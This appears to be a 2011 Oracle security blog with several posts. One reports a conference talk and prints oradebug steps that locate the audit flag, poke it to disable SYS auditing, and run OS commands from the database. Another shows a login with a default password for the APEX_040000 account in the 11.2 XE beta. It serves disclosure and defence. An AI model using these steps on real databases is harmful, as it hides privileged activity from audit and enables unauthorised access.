I just uploaded my DOAG 2011 presentation „Best of Oracle Security 2011„.
DOAG 2011 Presentation „Best of Oracle Security 2011“
November 18th, 2011Oracle Critical Patch Update Pre-Release Announcement – October 2011
Oktober 15th, 2011Oracle released the Pre-Release Announcement for the Oracle CPU October 2011. The upcoming CPU will fix 4 issues in the Oracle database:
- Application Express
- Core RDBMS
- Database Vault
- Oracle Text
The highest CVSS value is 6.5 (normally a SQL Injection vulnerability). None of the issues is remote exploitable.
Disable Auditing and running OS commands using oradebug
September 17th, 2011Currently I am staying at the Hacktivity 2011 conference in Budapest. I talked about Oracle Forensics (pdf of the presentation).The second talk was given by Laszlo Toth. He showed at lot of interesting things, e.g. how to disable Oracle Audit and SYS Auditing using oradebug. His presentation will be available soon on his sooner or later webpage soonerorlater.hu.
oradebug is an undocumented (from Oracle) feature in all versions of Oracle which allows powerful activities if you have SYSDBA privileges (and getting SYSDBA privileges is easy as DBA). The peek/poke statement allows to read/modify the memory of the database:
Sample – disable Oracle SYS Auditing:
sqlplus / as sysdba
SQL> — get the offset for oradebug
SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like ‚kzaflg_%‘;
KSMFSNAM ADDR INDX INST_ID KSMMMVAL
—————- ———- ———- —————-
kzaflg_ 0000000060031BB0 26652 1 0000000000000001
SQL> show parameter audit;
NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/PSALES/adump
audit_sys_operations boolean TRUE
audit_syslog_level string
audit_trail string DB, EXTENDED
SQL> oradebug poke 0x60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000
oradebug can also be used to disable standard auditing. oradebug makes Oracle products like Oracle Auditvault nearly useless because Oracle Auditvault relies on Oracle native auditing. A (SYS)DBA can switch off auditing for a few seconds, do activities without being audited and switch auditing on again. .
Another trick from Laszlo’s presentation was how to use oradebug to call OS commands via the database
SQL> oradebug call system „ls -la >/tmp/hacktivity.txt“
Later I will talk about Laszlo’s trick how to disable the Oracle authentication using oradebug.
Blackhat Training „HACKING AND SECURING ORACLE (2 days) „
April 13th, 2011Oracle Database 11.2 Express Edition Beta comes with weak default password
April 2nd, 2011Yesterday Oracle released the first beta of Oracle Database 11.2. Express Edition. I downloaded the beta and after installation I run our database scanner Repscan against it.
It was surprising that Oracle delivers 11.2 Express Edition with a default password for the open APEX_040000.
C:\>sqlplus apex_040000/oracle@192.168.2.38/XE
SQL*Plus: Release 11.1.0.7.0 – Production on Sat Apr 2 13:33:24 2011
Copyright (c) 1982, 2008, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 – Beta
SQL> desc dba_users
Name Null? Type
—————————————– ——– —————————-
USERNAME NOT NULL VARCHAR2(30)
USER_ID NOT NULL NUMBER
PASSWORD VARCHAR2(30)
ACCOUNT_STATUS NOT NULL VARCHAR2(32)
LOCK_DATE DATE
EXPIRY_DATE DATE
DEFAULT_TABLESPACE NOT NULL VARCHAR2(30)
TEMPORARY_TABLESPACE NOT NULL VARCHAR2(30)
CREATED NOT NULL DATE
PROFILE NOT NULL VARCHAR2(30)
INITIAL_RSRC_CONSUMER_GROUP VARCHAR2(30)
EXTERNAL_NAME VARCHAR2(4000)
PASSWORD_VERSIONS VARCHAR2(8)
EDITIONS_ENABLED VARCHAR2(1)
AUTHENTICATION_TYPE VARCHAR2(8)
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
—————————— —————————— — — —
APEX_040000 CONNECT NO YES NO
APEX_040000 RESOURCE YES YES NO
SQL> select * from user_sys_privs;
USERNAME PRIVILEGE ADM
—————————— —————————————- —
APEX_040000 CREATE TRIGGER YES
APEX_040000 CREATE SYNONYM YES
APEX_040000 UNLIMITED TABLESPACE YES
APEX_040000 ALTER SESSION NO
APEX_040000 CREATE JOB YES
APEX_040000 CREATE DIMENSION YES
APEX_040000 CREATE SEQUENCE YES
APEX_040000 CREATE TABLE YES
APEX_040000 ALTER USER NO
APEX_040000 CREATE USER NO
APEX_040000 CREATE SESSION YES
APEX_040000 CREATE OPERATOR YES
APEX_040000 ALTER DATABASE NO
APEX_040000 DROP USER NO
APEX_040000 CREATE INDEXTYPE YES
APEX_040000 CREATE MATERIALIZED VIEW YES
APEX_040000 CREATE VIEW YES
APEX_040000 CREATE CLUSTER YES
APEX_040000 CREATE ANY CONTEXT YES
APEX_040000 CREATE PROCEDURE YES
APEX_040000 DROP PUBLIC SYNONYM NO
APEX_040000 DROP TABLESPACE NO
APEX_040000 CREATE TABLESPACE NO
APEX_040000 CREATE TYPE YES
APEX_040000 CREATE ROLE NO
APEX_040000 CREATE PUBLIC SYNONYM NO
26 rows selected.
SQL>
This APEX user has for example ALTER USER privileges and can change the password of any user in the database.
Please change the password of APEX_040000 after the installation of the new 11.2 Express Edition beta.